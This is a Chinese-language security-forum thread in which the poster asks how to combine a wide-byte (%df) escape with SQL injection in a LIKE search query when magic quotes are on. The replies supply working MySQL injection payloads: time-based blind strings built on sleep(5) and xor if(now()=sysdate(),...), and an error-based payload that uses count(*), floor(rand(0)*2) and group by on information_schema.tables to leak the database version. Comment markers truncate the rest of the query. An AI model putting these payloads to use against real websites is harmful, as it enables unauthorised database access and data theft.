当宽字节遇到了搜索型注入还能注入么?

例如语句

select * from is_num where (id like '%注入点%')


注入点可控,但开了gpc。。想到%df,并且可以绕过,闭合了单引号

select * from is_num where (id like '%a%運'')

成了这样的。。
那么问题来了。

原语句'%test%'如果变成'%test%運'这样是出错的(%和'之间多了一个字符)。该怎么解决??


刚写的时候忘了悬赏,能解决的wb感谢

收藏 感谢(0)
分享到: 0
12 个回复
  1. 1# 好基友一辈子 | 2016-02-26 17:10

    mysql> select * from is_num where ((id like '%31206722%'))/**/and/**/sleep/**/(5
    );
    Empty set (10.00 sec)

    mysql> select * from is_num where ((id like '%31206722%hh'))/**/and/**/sleep/**/
    (5);
    Empty set (0.00 sec)


    本地环境试了一下。。错误。。

  2. 2# 风情万种 (JJ好痒) | 2016-02-26 17:53

    好像没办法 我曾试过同样的问题

  3. 3# mramydnei (一个逗逼运维) | 2016-02-26 18:12

    你的例子有问题。模糊查询不用以%结束。插入后不该是 '%sql运'%'么?

  4. 4# null_z | 2016-02-26 18:12

    一定用and么当宽字节遇到了搜索型注入还能注入么?_第1张图片

  5. 5# 玉林嘎 | 2016-02-26 18:21

    注入点明明在%%中间 咋会被你玩成'%a%運''

  6. 6# 好基友一辈子 | 2016-02-26 18:29

    @玉林嘎 @mramydnei 嗯嗯 手残写错了。。 大妞们理解就好 是m哥说的那样。

  7. 7# 好基友一辈子 | 2016-02-26 18:32

    @null_z 这个一般确实可以,但是如果把運加进去

    mysql> select * from is_num where (id like '%111dd運')xor if (now()=sysdate(),sleep(5),1);#%');
    Empty set (0.00 sec)

  8. 8# null_z | 2016-02-26 18:39

    @好基友一辈子 当宽字节遇到了搜索型注入还能注入么?_第2张图片

  9. 9# 好基友一辈子 | 2016-02-26 18:45

    @null_z mysql> select host from mysql.user where (host like '%ldh運')xor if (now()=sysda
    te(),sleep(5),1);#%');
    Empty set (0.00 sec)


    是不是环境问题

  10. 10# HRay (018) | 2016-02-26 19:29

    请在输入框输入如下内容運' and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a))#这里不知道你是否确定where后面加了括号,一般是不带括号的,如果没有括号就是運' and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#

  11. 11# HRay (018) | 2016-02-26 19:31

    按照lz给的语句,入库后就变成了select * from is_num where (id like '%運' and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a))#%')把后面的注释掉就好了

  12. 12#
    回复此人 感谢
    komas | 2016-02-27 12:13

    宽字符大多都出现在keyword字段上也就当然能注入了

你可能感兴趣的:(当宽字节遇到了搜索型注入还能注入么?)